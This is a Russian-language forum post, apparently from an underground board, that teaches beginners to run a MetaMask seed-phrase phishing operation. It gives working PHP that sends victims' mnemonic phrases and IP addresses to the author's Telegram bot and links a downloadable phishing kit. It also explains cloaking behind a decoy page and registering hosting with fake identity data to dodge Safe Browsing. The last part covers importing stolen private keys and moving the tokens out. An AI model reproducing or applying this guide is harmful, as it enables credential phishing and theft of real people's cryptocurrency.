Статья создана для людей, не имеющих опыта в этой сфере, но имеющих желание попробовать себя в этой области. Хотя стоит уточнить, что сейчас фишинг на мнемоническую фразу идет совсем не так хорошо, как еще пол года назад. Итак, начнем.
Что и за чем нужно делать ?
1. Создаем страницу (HTML, CSS, JS)
2. Настраиваем логирование в телеграм
3. Разбираемся с белой страницей и офером
4. Настраиваем хостинг
5. Настраиваем клоаку
6. Выжимаем максимум из логов
Перечень ресурсов и сервисов которые мы будем использовать.
Бот для получения вашего ID в телеграме - @username_to_id_bot
Сервис для клоакинга – Cloaking House
Хостинг - Namecheap
Браузерный кошелек - Metamask
Бот для анализа активов на кошельке – Crypto Finder
1. Создаем страницу (HTML, CSS, JS)
Для создания страницы, вам понадобятся базовые навыки работы с разметкой и стилями. В качестве примера можете использовать приложенный проект.
Для отправки логов в телеграм в этом проекте используется jquery и php.
Файлы проекта:
https://www.mediafire.com/file/2ir79mxnu0vgh7n/metaseed.zip/file
Обфусцированный js код в конце html разметки отвечает за анимированную голову лисицы.
Для работы с этим проектом я использовал Open Server Panel. Вы можете использовать любой другой локальный веб-сервер. Если вы откроете offer.html напрямую, страница не будет корректно отображаться.
Старайтесь избегать ссылок на официальный сайт METAMASK, когда верстаете страницу.
2. Настраиваем логирование в телеграм
В директории проекта есть файл test.php.
Тут находится код для отправки нам мнемонической фразы и ip адреса пользователя.
После попадания на главную страницу пользователь вводит мнемоническую фразу , после чего она отправляется к нам в телеграм.
PHP:
<?php
ini_set('display_errors', 0);
error_reporting(0);
$message=$_GET['message'];
$remoteIp=$_SERVER['REMOTE_ADDR'];
$botToken= 'токен вашего телеграм бота';
$chatId='ваш id в телеграм(как пользователя)';
$telegramApiUrl="https://api.telegram.org/bot{$botToken}/sendMessage";
$messageData=[
'chat_id'=>$chatId,
'text'=>"<code>$remoteIp</code>\n\n<code>$message</code>",
'parse_mode'=>'html',];
$httpOptions = [
'http' => [
'header' => 'Content-Type: application/x-www-form-urlencoded',
'method' => 'POST',
'content' => http_build_query($messageData),
],
];
$httpContext=stream_context_create($httpOptions);
$response=file_get_contents($telegramApiUrl,false,$httpContext);
if($response===false){
echo 'Failed to send the message.';
}
else{
echo 'Message sent successfully.';
}
?>Обратите внимание, что вам нужно подставить свои значения в переменные $botToken и $chatId. Для этого зараннее создаем телеграм бота для получения логов. Воспользуемся ботом @BotFather. Если вы знакомы с процесом создания ботов в телеграме, можете пропустить третий пункт инструкции.
Следуем такому алгоритму.
Дальше выбираем название и придумываем уникальное имя для вашего бота.
Название и уникальное имя необходимо придумать самому. Для подключения бота в нашем php файле вам нужен токен. На представленной выше картинке он выглядит так: 6490359840:AAENlFYai11AKkbGUe9FAEVDHniH_erzV-o. Вам нужно скопировать свой токен, и присвоить переменной $botToken значение в виде строки, таким образом:
Дальше переходим в переписку с ботом и нажимаем “ЗАПУСТИТЬ”
Следующим шагом, нам необходимо получить свой id пользователя. Для этого воспользуемся телергам ботом @username_to_id_bot. Вам необходимо запустить бота и он выдаст вам ваш id. Он будет иметь вид числа в таком формате - 5725159211. Помещаем его в переменную $chatId:
3. Разбираемся с офером и белой страницей
Если вам не знакомы эти понятия, то вам пора о них узнать. Офер - это, непосредственно, наша страница, на которой пользователь имеет удовольствие вводить свою мнемоническую фразу. Белая страница - это страница, на которую попадают боты-краулеры, когда попадают на наш сайт. Давайте создадим белую страницу. Для этого подойдет любой сайт, связанный с вашей тематикой (напр: криптовалюта, блокчейн) либо с доменным именем вашего сайта. Белая страница должна быть страницей чисто информативного характера. Пример такой страницы лежит в директории прикрепленного выше проекта с названием white.html.
Важно учесть, что белую страницу нужно периодически менять, поэтому лучше сверстать ее самому. В крайнем случае заказать. Ничего сложного тут нет, поэтому стоить это будет недорого.
4. Настраиваем клоаку
Если у вас есть опыт работы с клоакингом, можете пропускать этот пункт. Для всех остальных могу предложить сервис https://cloaking.house/. Его настройка проходит легко и понятно. Кроме того Cloaking House имеет бесплатный тестовый период, который длится 10 дней. После этого вы можете создать новый аккаунт и снова начать пробный период. Мультиаккаунт никак не пресекается сервисом. При регистрации вы можете указывать несуществующий телеграм аккаунт и электронную почту, подлинность аккаунтов проверятся не будет.
После прохождения регистрации на сайте https://cloaking.house/, мы попадаем в кабинет.
Нажимаем большую синюю кнопку «Создать поток».
Далее, вводим произвольное название потока (на картинке внизу это - test). В поле White Page пишем название файла белой страницы (на картинке внизу это – white.html) , в поле Offer Page название нашей главной страницы (на картинке внизу это –offer.html) и нажимаем кнопку «Продолжить».
На следующей странице ( картинка внизу) активируем пункты “Cloaking” и “Запретить переходы без ISP”. Переходы с vpn не запрещаем, потому что таким образом потеряем людей с включенным vpn.
IPv6 – новая версия интернет протокола, уже используется многими смартфонами, так что пользователей с IPv6 исключать с помощью фильтров не будем. Регуляция переходов без referrer работает на этом сервисе не очень корректно, поэтому этот пункт оставляем неактивным.
Исключать с помощью фильтра мы будем пользователей, которые сделали больше 5 кликов по нашей ссылке в сутки. В основном, так ведут себя только боты, которые ускоряют бан вашего сайта.
Выбираем все страны, устройства, операционные системы и браузеры. В поле “черный список” вы можете выбрать созданный раннее черный список. Создать его можно в главном меню. Вносить туда стоит ip-адреса, которые показались вам подозрительными. Рассматривать функцию "черный список" подробно мы в этой статье не будем.
Переходим на следующую страницу. Тут необходимо включить настроенный только что клоакинг. В поле “Белый список” вы можете внести ip, к которым не будут применены наши фильтры. Сюда вы, например, можете внести ваш ip.
Настройка закончена. Вас автоматически переместит на главную страницу, где вам нужно скачать файл index.php и поместить его в директорию проекта.
5. Настраиваем хостинг.
Я использую хостинг Namecheap. Стоит заметить что этот не является лучшим решением для подобного рода сайтов. Будет разумнее использовать оффшорный хостинг (bulletproof), но следует учесть, что он обойдется почти в 2 раза дороже. Однако, стоит добавить, что и bulletproof хостинг не является средством от красного экрана google safebrowsing, хотя и поможет оттянуть его появление.
Если вы тоже захотите , как и я , возпользоваться хостингом Namecheap, то первым делом нужно пройти регистрацию на сайте https://www.namecheap.com/. После регистрации вы попадаете в кабинет , в котором вам нужно выбрать и приобрести доменное имя для вашего сайта. Для того, чтобы перейти в магазин, наводим мышкой на кнопку Domain, и в выпадающем меню выбираем «Domain Name Search».
В поле для ввода помещаем желаемое название для вашего сайта ( на картинке это - testforxss). Это достаточно важный этап ! Если вы выберете доменное имя, которое слишком походит на доменное имя оригинального сайта, вы сразу попадете в поле зрения ботов-краулеров. С другой стороны, если вы назовете свой сайт слишком абстрактно, у пользователя скорее всего возникнут сомнения по поводу достоверности этого сайта.
Добавляем домен в корзину , туда же сразу добавляем хостинг, к которому он будет привязан.
Переходим в корзину для оплаты (находится в правом верхнем углу на странице)
В процессе оплаты домена и хостинга может возникнуть потребность внести информацию о себе. Смело можно писать выдуманные данные, проверятся они не будут.
Оплатить можно криптовалютой. В качестве средтства оплаты баланс аккаунта (красная стрелка 1) .Для этого сперва нужно пополнить баланс. Переходим по ссылке “add funds” (красная стрелка 2)
Выбираем метод оплаты – оплата с помощью криптовалюты.
Необходимо ввести точную сумму, которая указана в правом верхнем углу экрана сайта на котором мы находимся, то есть вводим суммарную стоимость домена и хостинга. Дальше следуйте инструкциям. Процесс, непосредственно, оплаты интуитивно понятен.
Чтобы научиться загружать файлы вашего сайта на хостинг Namecheap, рекомендую ознакомится с этим видео.
Для того, чтобы избежать преждевременного появления красного окна от google safe browsing, вам нужно настроить сокращатель ссылок. Можно использовать любой. После поступления жалоб, сервис сделает нашу ссылку неактивной, зато наш сайт останется онлайн и нам не нужно будет оплачивать новый хостинг и домен, а также регистрировать все заново.
6. Выжимаем максимум из логов
В нашем телеграм боте мы будем получать логи в таком формате:
Для того, чтобы быстро и детально проверить мнемонику и выжать из нее максимум за короткий срок можно использовать телеграм бот Crypto Finder. Это удобный бот, который проверяет первые 100 дериваций по нашей мнемонической фразе. Также, этот бот хорош тем, что подсчитывает стоимость всех находящихся на кошельке NFT, которые потом, например, можно продать на сайте Opensea. Для этого нужно подключить кошелек с NFT к сайту Opensea, перейти в свой профиль и продать NFT по существующим оферам. Рассматривать подробно процесс продажи NFT в этой статье мы не будем.
Пример того, как ботом Crypto Finder будет отображаться информация по криптоактивам , находящимся в кошельке пользователя, приведен ниже на картинке.
Для того, чтобы получить подробный анализ криптоактивов, находящися на кошельках, доступ к которым у вас появился с помощью полученной мнемонической фразы, вы отправляете фразу из лога в этот бот таким образом:
Если несколько дериваций содержат активы, бот отправит каждый отдельным сообщением, вместе с приватным ключом от этого кошелька.
После того, как мы получили детальную информацию о активах, мы можем сразу скопировать приватный ключ от кошелька, который содержится в сообщении от бота и импортировать в свой метамаск для получения доступа к активам.
Внизу , на картинках, вы увидите процесс импора полученного от бота приватного ключа в ваш Метамаск.
В поле, помеченном красной стрелкой, нужно внести приватный ключ, который выдал нам бот Crypto Finder. После чего, если Метамаск сам не подтянул находящиеся на кошельке активы, нам нужно найти адрес контракта актива, который выдал нам бот, например:
Чтобы найти адрес контракта вводим в Google «token contract address weth polygon», где weth– название актива, polygon – название сети.
Заходим на найденный ресурс, копируем адрес контракта.
После этого мы можем импортировать токен в метамаск следующим образом.
Далее, вы можете вывести токен с текущего кошелька на свой кошелек. Старайтесь не использовать в таких случаях кастодиальные кошельки (внутрибиржевые кошельки), потому что это грозит, как минимум, блокировкой вашего аккаунта вместе с активами. Тему очистки нативных монет и токенов мы рассматривать в этой статье не будем.
Вот мы и закончили. Конечно, самый важный аспект для получения дохода это трафик. В этой статье мы не будем рассматривать тему привлечения посетителей на фишинговый сайт, это фантазия каждого. Чем шире известен способ распространения вашего фишинга, тем сложнее вам будет заработать с его помощью. Будьте креативны, пробуйте проливать по разному. Всем удачи!
Если возникли какие-то вопросы, можете смело задавать мне в лс. Дерзайте и да прибудет с вами удача !
Последнее редактирование:
